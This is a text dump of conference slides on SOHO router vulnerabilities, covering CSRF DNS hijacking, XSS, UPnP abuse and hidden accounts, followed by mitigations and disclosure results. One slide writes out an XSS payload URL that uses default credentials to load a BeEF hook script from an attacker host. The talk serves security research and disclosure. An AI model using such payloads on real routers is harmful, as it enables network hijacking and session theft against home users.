SlideShare a Scribd company logo
1 of 56
Swords & Shields
SOHO Routers:
Álvaro Folgado, José Antonio Rodríguez, Iván Sanz
About us…
3
Meet our research group
Álvaro Folgado
Rueda
Independent Researcher
José Antonio
Rodríguez García
Independent Researcher
Iván Sanz de Castro
Security Analyst at
Wise Security Global.
The talk
Mitigations
4
Vulnerabilities & Attacks
Keys
Real World Attacks
 Example 1 – Dictionary for DNS Hijacking via CSRF
5
Real World Attacks
 Example 2 – Phishing website
6
Real World Attacks
7
 Example 3 – Linux/Moose Malware
Common security problems
 Services
 Too many. Mostly useless.
□Increases attack surfaces
 Insecure
8
Common security problems
 Default credentials
 Public and well-known for each model
 Non randomly generated
 Hardly ever modified by users
9
45%
27%
5%
5%
18%
User / Password
1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone
Common security problems
 Multiple user accounts
 Also with public default credentials
 Mostly useless for users
 Almost always hidden for end-users
□Passwords for these accounts are never changed
10
11
Swords
Bypass Authentication
 Allows unauthenticated attackers to carry out router
configuration changes
 Locally and remotely
 Exploits:
 Improper file permissions: Web configuration interface
 Service misconfiguration: SMB and Twonky Media Server
12
 Persistent DoS / Restore router to default
settings without requiring authentication
 Exploiting the Twonky Media Server
Video Demos #1 & #2
Cross Site Request Forgery
 Change any router configuration settings by sending
a specific malicious link to the victim
 Main goal
 DNS Hijacking
 Requires embedding login credentials in the
malicious URL
 Attack feasible if credentials have never been changed
 Google Chrome does not pop-up warning
13
Cross Site Request Forgery
 Suspicious link, isn't it?
 URL Shortening Services
 Create a malicious website
14
Persistent Cross Site Scripting
 Inject malicious script code within the web
configuration interface
 Goals
 Session Hijacking
 Browser Infection
15
Persistent Cross Site Scripting
 Browser Exploitation Framework is a great help
 Input field character length limitation
 BeEF hooks link to a more complex script file hosted by the
attacker
http://1234:1234@192.168.1.1/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
16
Unauthenticated Cross Site Scripting
 Script code injection is performed locally without
requiring any login process
 Send a DHCP Request PDU containing the malicious
script within the hostname parameter
 The malicious script is injected within Connected
Clients (DHCP Leases) table
17
Unauthenticated Cross Site Scripting
18
Unauthenticated Cross Site Scripting
 Always try harder
19
Privilege Escalation
 User without administrator rights is able to escalate
privileges and become an administrator
 Shows why multiple user accounts are unsafe
20
 Privilege Escalation via FTP
Video Demo #3
Backdoor
 Hidden administrator accounts
 Completely invisible to end users
 But allows attackers to change any configuration setting
21
Information Disclosure
 Obtain critical information without requiring any
login process
 WLAN password
 Detailed list of currently connected clients
 Hints about router's administrative password
 Other critical configuration settings
22
Information Disclosure
23
Universal Plug and Play
 Enabled by default on several router models
 Allows application to execute network configuration
changes such as opening ports
 Extremely insecure protocol
 Lack of an authentication process
 Awful implementations
 Main goals
 Open critical ports for remote WAN hosts
 Persistent Denial of Service
 Carry out other configuration changes
24
Universal Plug and Play
 Locally
 Miranda UPnP tool
25
Universal Plug and Play
 Remotely
 Malicious SWF file
26
Attack vectors
 Locally
 Attacker is connected to the victim's LAN either using an
Ethernet cable or wirelessly
 Remotely
 The attacker is outside of the victim's LAN
27
Social Engineering is your friend
 For link-based remote attacks
 XSS, CSRF and UPnP
 Social Networks = Build the easiest botnet ever!
 Phishing emails = Targeted attacks
28
29
 DNS Hijacking via CSRF
Live Demo #1
 Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #2
 Reflected XSS + client-side attack to get Reverse Shell
Live Demo #3
 Bypass Authentication using SMB Symlinks
Live Demo #4
30
 Using a Reflected Cross Site Scripting to get a Reverse
Shell on victim's computer
 Exploits an Internet Explorer client-side vulnerability:
CVE-2012-1876
Live Demo #3: Details
31
Shields
Mitigations: End users
 Users start with a broken shield
 Limited configuration settings
 Several attacks cannot be stopped
 Mitigations only work for specific models
 Not as easy as buying a brand new router
 No antivirus is going to protect you
32
Mitigations: End users
 Where to start?
 Identify your router model
 Look for router credentials
 Get into the advanced configuration interface
33
Mitigations: End users
 General recommendations
 Only log into the web interface when needed
□ Logout (if possible) / Wipe browser's cache after finishing
 Change your router's administrative password
34
Mitigations: End users
 General recommendations
 Check your DNS servers on a weekly basis
35
Mitigations: End users
 General recommendations
 Do not trust shortened links
 Be careful when browsing the web interface
36
Mitigations: End users
 Multiple user accounts
 Try to delete any other administrative account
 At least, change their passwords, if possible
37
Video Demo #4
 Mitigating Privilege Escalation and
account-related attacks
38
Mitigations: End users
 Services
 Disable any unused service if given the chance
□FTP and SMB
□Media Servers: Twonky
□UPnP
□If local risk, DHCP
 It does not always work…
39
Mitigations: End users
 Firmware
 Update to the latest version
□Manufacturer might have not fixed any issues
 How?
40
Mitigations: End users
 Custom Firmware Images
 For advanced users
 More configuration settings
 Might have security flaws as well
41
Mitigations: Manufacturers
 Listen to what security researchers have to say
 Do not include useless services
 Specially for ISP SOHO routers
 At least, make it feasible to completely shut them down
 Critical ports closed to WAN by default
 At least 21, 22, 23, 80 and 8000/8080
42
Mitigations: Manufacturers
 Do not include multiple user accounts
 Design a safer alternative to UPnP
 Avoid using unsafe protocols
 HTTP. Telnet. FTP. HTTPS. SSH. SFTP.
 Randomly generate user credentials
43
Admin
Password
Serial
Number
MAC
Address
Manufact.
Date
Mitigations: Manufacturers
 XSS
 Check every input field within router's web interface
 Sanitize DHCP hostname parameters
 Content Security Policies
44
Mitigations: Manufacturers
 CSRF
 Tokens… that work
45
Mitigations: Manufacturers
 Bypass Authentication & Information Disclosure
 Check for improper file permissions and public debug
messages
 Service-related
 Check for possible wrong service configuration (e.g.: FTP,
SMB)
46
47
Keys
Developed tools
48
Manufacturers' response
 Average 2-3 emails sent to each manufacturer
 Most of them unreplied... 7 months later
 Number of vulnerabilities fixed: 0
49
Responsible Disclosure
50
Results
 More than 60 vulnerabilities have been discovered
 22 router models affected
 11 manufacturers affected
51
52
0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per
manufacturer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
53
21%
15%
20%
8%
2%
3%
2%
6%
23%
XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities
by types
Conclusion
 Has SOHO router security
improved?
 Hell NO!
 Serious security problems
 Easy to exploit
 With huge impact
 Millions of users affected
 PLEASE, START FIXING
SOHO ROUTER SECURITY
54
55
Álvaro Folgado Rueda · alvfolrue@gmail.com
José A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
Thank you!
Q&A Time
https://cybercamp.es @CyberCampEs#CyberCamp15

More Related Content

What's hot

Breaking Closed Systems with Code-Signing and Mitigation Techniques
Breaking Closed Systems with Code-Signing and Mitigation TechniquesBreaking Closed Systems with Code-Signing and Mitigation Techniques
Breaking Closed Systems with Code-Signing and Mitigation TechniquesPriyanka Aash
 
Ch 13: Network Protection Systems
Ch 13: Network Protection SystemsCh 13: Network Protection Systems
Ch 13: Network Protection SystemsSam Bowne
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Firewall ( Cyber Security)
Firewall ( Cyber Security)Firewall ( Cyber Security)
Firewall ( Cyber Security)Jainam Shah
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsPriyanka Aash
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerDavid Sweigert
 
Defcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddosDefcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddosPriyanka Aash
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy codeG Prachi
 
Ceh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webserversCeh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webserversVi Tính Hoàng Nam
 
Ch 9: Embedded Operating Systems: The Hidden Threat
Ch 9: Embedded Operating Systems: The Hidden ThreatCh 9: Embedded Operating Systems: The Hidden Threat
Ch 9: Embedded Operating Systems: The Hidden ThreatSam Bowne
 
Assignment on windows firewall
Assignment on windows firewallAssignment on windows firewall
Assignment on windows firewallMd Shihab
 
Firewall Security Definition
Firewall Security DefinitionFirewall Security Definition
Firewall Security DefinitionPatten John
 

What's hot (20)

Net Defender
Net DefenderNet Defender
Net Defender
 
Security tools
Security toolsSecurity tools
Security tools
 
Tech f43
Tech f43Tech f43
Tech f43
 
Windows network
Windows networkWindows network
Windows network
 
Breaking Closed Systems with Code-Signing and Mitigation Techniques
Breaking Closed Systems with Code-Signing and Mitigation TechniquesBreaking Closed Systems with Code-Signing and Mitigation Techniques
Breaking Closed Systems with Code-Signing and Mitigation Techniques
 
Netdefender
NetdefenderNetdefender
Netdefender
 
Ch 13: Network Protection Systems
Ch 13: Network Protection SystemsCh 13: Network Protection Systems
Ch 13: Network Protection Systems
 
Network security
Network securityNetwork security
Network security
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Firewall ( Cyber Security)
Firewall ( Cyber Security)Firewall ( Cyber Security)
Firewall ( Cyber Security)
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
 
Check Point designing a security
Check Point designing a securityCheck Point designing a security
Check Point designing a security
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical Hacker
 
Defcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddosDefcon 22-weston-hecker-burner-phone-ddos
Defcon 22-weston-hecker-burner-phone-ddos
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy code
 
Ceh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webserversCeh v5 module 11 hacking webservers
Ceh v5 module 11 hacking webservers
 
Ch 9: Embedded Operating Systems: The Hidden Threat
Ch 9: Embedded Operating Systems: The Hidden ThreatCh 9: Embedded Operating Systems: The Hidden Threat
Ch 9: Embedded Operating Systems: The Hidden Threat
 
Assignment on windows firewall
Assignment on windows firewallAssignment on windows firewall
Assignment on windows firewall
 
Firewall Security Definition
Firewall Security DefinitionFirewall Security Definition
Firewall Security Definition
 

Viewers also liked

Adam Bolton - IDinLondon Conference slides
Adam Bolton - IDinLondon Conference slidesAdam Bolton - IDinLondon Conference slides
Adam Bolton - IDinLondon Conference slidesAdam Bolton
 
что это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учётачто это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учётаfeniks2007
 
Avon product analysis 2009
Avon product analysis 2009Avon product analysis 2009
Avon product analysis 2009adrifadhlihsuma
 
Zero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemesZero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemesChinni Harshith
 
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.Adam Bolton
 
Ica job guarantee institute of Accounting and Tally
Ica job guarantee institute of Accounting and TallyIca job guarantee institute of Accounting and Tally
Ica job guarantee institute of Accounting and Tallyjyotizaware1
 
principles of programming languages
principles of programming languages principles of programming languages
principles of programming languages Lakshmi Prasad
 
NDC London - about IDinLondon
NDC London - about IDinLondonNDC London - about IDinLondon
NDC London - about IDinLondonAdam Bolton
 
patanjali marketing strategy
patanjali marketing strategy patanjali marketing strategy
patanjali marketing strategy Chinni Harshith
 

Viewers also liked (16)

role model entrepreneur
role model entrepreneurrole model entrepreneur
role model entrepreneur
 
Barack obama
Barack obamaBarack obama
Barack obama
 
Adam Bolton - IDinLondon Conference slides
Adam Bolton - IDinLondon Conference slidesAdam Bolton - IDinLondon Conference slides
Adam Bolton - IDinLondon Conference slides
 
что это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учётачто это с точки зрения бухгалтеского учёта
что это с точки зрения бухгалтеского учёта
 
Avon product analysis 2009
Avon product analysis 2009Avon product analysis 2009
Avon product analysis 2009
 
P (2)
P (2)P (2)
P (2)
 
P (2)
P (2)P (2)
P (2)
 
cv
cvcv
cv
 
Zero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemesZero interest consumer goods purchase schemes
Zero interest consumer goods purchase schemes
 
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
CV Workshop - IDinLondon - 11th November 2014, Adam Bolton.
 
maths
mathsmaths
maths
 
Ica job guarantee institute of Accounting and Tally
Ica job guarantee institute of Accounting and TallyIca job guarantee institute of Accounting and Tally
Ica job guarantee institute of Accounting and Tally
 
Hacking Web: Attacks & Tips
Hacking Web: Attacks & TipsHacking Web: Attacks & Tips
Hacking Web: Attacks & Tips
 
principles of programming languages
principles of programming languages principles of programming languages
principles of programming languages
 
NDC London - about IDinLondon
NDC London - about IDinLondonNDC London - about IDinLondon
NDC London - about IDinLondon
 
patanjali marketing strategy
patanjali marketing strategy patanjali marketing strategy
patanjali marketing strategy
 

Similar to Soho routers: swords and shields CyberCamp 2015

Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking   chapter 8 - Windows Vulnerabilities - Eric VanderburgEthical hacking   chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric VanderburgEric Vanderburg
 
Microsoft Operating System Vulnerabilities
Microsoft Operating System VulnerabilitiesMicrosoft Operating System Vulnerabilities
Microsoft Operating System VulnerabilitiesInformation Technology
 
Microsoft OS Vulnerabilities
Microsoft OS VulnerabilitiesMicrosoft OS Vulnerabilities
Microsoft OS VulnerabilitiesSecurityTube.Net
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Defense Against the Dark Arts of Game Piracy and Cheating
Defense Against the Dark Arts of Game Piracy and CheatingDefense Against the Dark Arts of Game Piracy and Cheating
Defense Against the Dark Arts of Game Piracy and CheatingArka Ray
 
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...apidays LIVE Australia 2021 - Levelling up database security by thinking in A...
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...apidays
 
Ch04 Network Vulnerabilities and Attacks
Ch04 Network Vulnerabilities and AttacksCh04 Network Vulnerabilities and Attacks
Ch04 Network Vulnerabilities and AttacksInformation Technology
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Black Duck by Synopsys
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Tim Mackey
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointZack Meyers
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesAmazon Web Services
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDebra Baker, CISSP CSSP
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present DangersPeter Wood
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 

Similar to Soho routers: swords and shields CyberCamp 2015 (20)

Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking   chapter 8 - Windows Vulnerabilities - Eric VanderburgEthical hacking   chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
 
NAC_p3.pptx
NAC_p3.pptxNAC_p3.pptx
NAC_p3.pptx
 
Microsoft Operating System Vulnerabilities
Microsoft Operating System VulnerabilitiesMicrosoft Operating System Vulnerabilities
Microsoft Operating System Vulnerabilities
 
Microsoft OS Vulnerabilities
Microsoft OS VulnerabilitiesMicrosoft OS Vulnerabilities
Microsoft OS Vulnerabilities
 
WLAN Security
WLAN Security WLAN Security
WLAN Security
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Defense Against the Dark Arts of Game Piracy and Cheating
Defense Against the Dark Arts of Game Piracy and CheatingDefense Against the Dark Arts of Game Piracy and Cheating
Defense Against the Dark Arts of Game Piracy and Cheating
 
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...apidays LIVE Australia 2021 - Levelling up database security by thinking in A...
apidays LIVE Australia 2021 - Levelling up database security by thinking in A...
 
Ch04 Network Vulnerabilities and Attacks
Ch04 Network Vulnerabilities and AttacksCh04 Network Vulnerabilities and Attacks
Ch04 Network Vulnerabilities and Attacks
 
Secure network
Secure networkSecure network
Secure network
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best Pratices
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
 
Proxy servers-firewalls
Proxy servers-firewallsProxy servers-firewalls
Proxy servers-firewalls
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 

Recently uploaded

Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024hassan khalil
 
main PPT.pptx of girls hostel security using rfid
main PPT.pptx of girls hostel security using rfidmain PPT.pptx of girls hostel security using rfid
main PPT.pptx of girls hostel security using rfidNikhilNagaraju
 
Application of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptxApplication of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptx959SahilShah
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfme23b1001
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxk795866
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile servicerehmti665
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )Tsuyoshi Horigome
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxpurnimasatapathy1234
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxDeepakSakkari2
 
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxDecoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxJoão Esperancinha
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxbritheesh05
 
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)dollysharma2066
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...VICTOR MAESTRE RAMIREZ
 
Current Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLCurrent Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLDeelipZope
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionDr.Costas Sachpazis
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ
 
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfCCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfAsst.prof M.Gokilavani
 
HARMONY IN THE HUMAN BEING - Unit-II UHV-2
HARMONY IN THE HUMAN BEING - Unit-II UHV-2HARMONY IN THE HUMAN BEING - Unit-II UHV-2
HARMONY IN THE HUMAN BEING - Unit-II UHV-2RajaP95
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024Mark Billinghurst
 
power system scada applications and uses
power system scada applications and usespower system scada applications and uses
power system scada applications and usesDevarapalliHaritha
 

Recently uploaded (20)

Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024
 
main PPT.pptx of girls hostel security using rfid
main PPT.pptx of girls hostel security using rfidmain PPT.pptx of girls hostel security using rfid
main PPT.pptx of girls hostel security using rfid
 
Application of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptxApplication of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptx
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdf
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptx
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile service
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptx
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptx
 
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxDecoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptx
 
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...
 
Current Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCLCurrent Transformer Drawing and GTP for MSETCL
Current Transformer Drawing and GTP for MSETCL
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
 
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
VICTOR MAESTRE RAMIREZ - Planetary Defender on NASA's Double Asteroid Redirec...
 
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfCCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
 
HARMONY IN THE HUMAN BEING - Unit-II UHV-2
HARMONY IN THE HUMAN BEING - Unit-II UHV-2HARMONY IN THE HUMAN BEING - Unit-II UHV-2
HARMONY IN THE HUMAN BEING - Unit-II UHV-2
 
IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024IVE Industry Focused Event - Defence Sector 2024
IVE Industry Focused Event - Defence Sector 2024
 
